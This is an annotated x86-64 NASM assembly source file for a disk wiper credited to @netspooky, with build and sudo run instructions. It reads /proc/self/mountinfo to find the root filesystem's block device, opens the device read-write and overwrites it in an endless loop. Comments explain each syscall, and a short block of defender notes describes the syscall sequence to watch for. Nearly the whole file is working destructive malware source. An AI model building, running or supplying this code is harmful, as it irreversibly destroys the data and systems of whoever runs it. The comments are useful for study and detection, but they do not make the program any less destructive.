;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
;;; ;;; ;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;; ;;;
;;;;;;;;; ;;;;;;;;; ;;;;;; ;;; ;;; ;;; ; ;;; ;;; ;;;
;;; ;;;;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;;
;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;
;-------------------------------------------------------------------------------
; /!\ WARNING /!\
; This program WILL destroy your disk. Run at your own risk, and only
; on systems you are authorized to destroy.
;
; This program opens /proc/self/mountinfo to enumerate filesystems and disks.
; It finds where the filesystem root (/) is mounted, and writes a pattern to
; the entirety of the disk.
;
; Using /proc/self/mountinfo to find / :
;
; [ EXAMPLE ]
;
; $ grep '/ / ' /proc/self/mountinfo
; 32 1 259:2 / / rw,relatime shared:1 - ext4 /dev/nvme0n1p2 rw,errors=remount-ro
; $ grep '/ / ' /proc/self/mountinfo
; 25 0 8:0 / / rw,relatime shared:1 - ext4 /dev/sda rw,errors=remount-ro
;
; Build:
; $ nasm -f elf64 p3.asm ; ld p3.o -o p3
; Run:
; $ sudo ./p3
;----------------------------------------------------------------- @netspooky --
;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;;
;;; ;;; ;;; ;;; ;;; ;;; ;;;
;;; ;;;;;;;;; ;;;;;;;;; ;;;;;; ;;;;;;
;;; ;;; ;;; ;;;;;; ;;; ;;;
;;; ;;; ;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
;-------------------------------------------------------------------------------
section .text ;
global _start ;
;-------------------------------------------------------------------------------
; _start - entry point. No libc; raw Linux x86-64 syscalls, NASM syntax.
;
; Flow: open("/proc/self/mountinfo") -> read one 16 KiB chunk onto the stack
;       -> scan it for the "/ / " record of the root mount -> open the device
;       path named in that record with O_RDWR -> write(2) in an endless loop.
;
; Register roles as used below:
;   rsp = stack pointer AND the scan cursor through the mountinfo buffer
;   rcx = byte budget for the scan, later the length of the device path
;   rdi/rsi/rdx/rax = syscall arguments / syscall number
;   r9  = fd of mountinfo (stored once, never read again in this file)
;
; No syscall return value is checked anywhere: a failed open() or read()
; simply feeds a bad fd or an unfilled buffer into the next step.
;
; Defender notes: the second open() needs write access to the raw block
; device node (the header says sudo), so an unprivileged run typically stops
; there with EACCES. The auditable sequence is: open of /proc/self/mountinfo,
; open of a block device with O_RDWR, then a tight loop of 8-byte write(2)s.
;-------------------------------------------------------------------------------
_start: ;
mov rdi, 0x6f666e69 ; "info" + 4 NUL bytes - the 32-bit immediate is zero-extended, ;
push rdi ; so this first push also supplies the string terminator ;
mov rdi, 0x746e756f6d2f666c ; "lf/mount" ;
push rdi ; ;
mov rdi, 0x65732f636f72702f ; "/proc/se" - stack now holds "/proc/self/mountinfo\0" ;
push rdi ; ;
mov rdi, rsp ; const char *pathname ;
xor rsi, rsi ; int flags = 0 = O_RDONLY ;
mov rax, rsi ; 0 ;
inc rax ; 1 ;
inc rax ; 2 = SYS_open ;
syscall ; rax = fd, or -errno (not checked) ;
reader: ; Read /proc/self/mountinfo into a stack buffer so it can be parsed. ;
inc rdx ; assumes rdx is still 0 here (fresh process; open() does not touch it) ;
shl rdx, 14 ; size_t count = 1 << 14 = 0x4000 (16 KiB) - note: not 0x400 ;
sub rsp, rdx ; reserve 0x4000 bytes of stack for the buffer ;
mov r9, rax ; fd copied to r9 - nothing below reads r9 again ;
mov rdi, rax ; int fd ;
mov rsi, rsp ; void *buf = the stack buffer ;
xor eax, eax ; 0 = SYS_read ;
syscall ; rax = bytes read (not checked); rsi and rsp still point at buf ;
mov di, 0x202f ; little-endian "/ ": dil = '/' (0x2f), high byte = ' ' (0x20) ;
xor rcx, rcx ; 0 ;
inc rcx ; 1 ;
shl rcx, 14 ; 0x4000 - scan budget = whole buffer, regardless of bytes read ;
comp1: ; Scan byte by byte for "/ " (a field separator in a mount record) ;
mov bx, word[rsp] ; bx = the two bytes at the cursor ;
cmp di, bx ; match against "/ " ;
je comp2 ; candidate for "/ / ", check the following two bytes ;
dec rcx ; budget-- ;
jz xxit ; budget exhausted: no root record found, exit ;
inc rsp ; advance the cursor one byte (rsp is the cursor) ;
jmp comp1 ; ;
comp2: ; Expect a second "/ " right after the first one ;
inc rsp ; the two bytes at rsp are already known to be "/ ", ;
inc rsp ; so step over them ;
mov bx, word[rsp] ; bx = the next two bytes ;
cmp di, bx ; same "/ " comparison ;
je comp3 ; "/ / " found: this is the root mount record ;
dec rcx ; budget-- for the first skipped byte ;
jz xxit ; ;
dec rcx ; budget-- for the second skipped byte ;
jz xxit ; ;
inc rsp ; no match: resume scanning ;
jmp comp1 ; ;
comp3: ; Inside the root record: find the next '/', which starts the device ;
; path. This loop has no rcx budget, so a record without a further '/' ;
; keeps reading past the end of the buffer. ;
inc rsp ; ;
mov bl, byte[rsp] ; one byte at a time from here on ;
cmp dil, bl ; dil still holds '/' from the 0x202f load above ;
je prep ; found the start of the device path ;
jmp comp3 ; ;
prep: ; Set up for collecting the device path ;
xor rcx, rcx ; rcx = length of the device path, counted below ;
mov dil, 0x20 ; now searching for the terminating ' ' ;
getdisk: ; Walk the device path up to the next space ;
inc rsp ; ;
inc rcx ; length++ ;
mov bl, byte[rsp] ; ;
cmp dil, bl ; is it ' ' ? ;
je opendisk ; yes: rsp is at the space and rcx = path length ;
jmp getdisk ; ;
opendisk: ; Open the device named in the record, read-write ;
xor rsi, rsi ; 0 ;
add rsp, 8 ; rsp = space + 8, so that the push below ... ;
push rsi ; ... stores 8 zero bytes over the space and the 7 bytes after it ;
; (in-place NUL termination; it clobbers the rest of that mountinfo line) ;
sub rsp, rcx ; rsp = first byte of the device path ;
mov rdi, rsp ; const char *pathname = device path ;
inc rsi ; 1 ;
inc rsi ; 2 = O_RDWR ;
mov rax, rsi ; 2 = SYS_open (same numeric value as the flags, reused) ;
syscall ; rax = device fd, or -errno (not checked) ;
writer: ; Device is open read-write, no O_APPEND; file position is 0. ;
mov rdi, rax ; int fd ;
mov rsi, 0x7557575757575775 ; marker bytes "uWWWWWWu" (little-endian) ;
push rsi ; marker now lives on the stack ;
mov rsi, rsp ; const void *buf = marker ;
xor rax, rax ; 0 ;
inc rax ; 1 = SYS_write ;
mov rdx, rax ; 1 ;
shl rdx, 3 ; size_t count = 8 ;
syscall ; write(fd, marker, 8) - return value not checked ;
lseeker: ; Adjust the file position before the pattern loop. ;
; NOTE(review): whence = 1 is SEEK_CUR, not SEEK_SET (which is 0), so this ;
; moves 8 bytes forward from the current position, i.e. past the marker, ;
; rather than to absolute offset 8. ;
xor rdx, rdx ; 0 ;
inc rdx ; int whence = 1 = SEEK_CUR ;
mov rsi, rdx ; 1 ;
shl rsi, 3 ; off_t offset = 8 ;
mov rax, rsi ; 8 = SYS_lseek ;
syscall ; rdi still holds fd (syscall clobbers only rax, rcx, r11) ;
writer2: ; Endless 8-byte write loop. Every pass pushes another qword, so the ;
; stack grows by 8 bytes per write and the process eventually dies with ;
; SIGSEGV once the stack limit is hit. write() errors (ENOSPC at end of ;
; device, EBADF if the open failed) are never inspected; the loop spins on. ;
mov rsi, 0xABACABACABACABAC ; the pattern written to the device ;
push rsi ; ;
mov rsi, rsp ; const void *buf = pattern ;
xor rax, rax ; 0 ;
inc rax ; 1 = SYS_write ;
mov rdx, rax ; 1 ;
shl rdx, 3 ; size_t count = 8 ;
syscall ; return value not checked ;
jmp writer2 ; ;
xxit: ; Reached only when the scan budget runs out (no "/ / " record found) ;
mov al, 0x3c ; 60 = SYS_exit - only al is written, so this relies on the upper ;
; bits of rax already being zero (true when rax is a small read() count, ;
; not when read() returned a -errno value) ;
xor rdi, rdi ; exit status 0 ;
syscall ;------------------------------------------------------------------;
; Dedicated to those fighting for police accountability worldwide. ;
;------------------------------------------------------------------;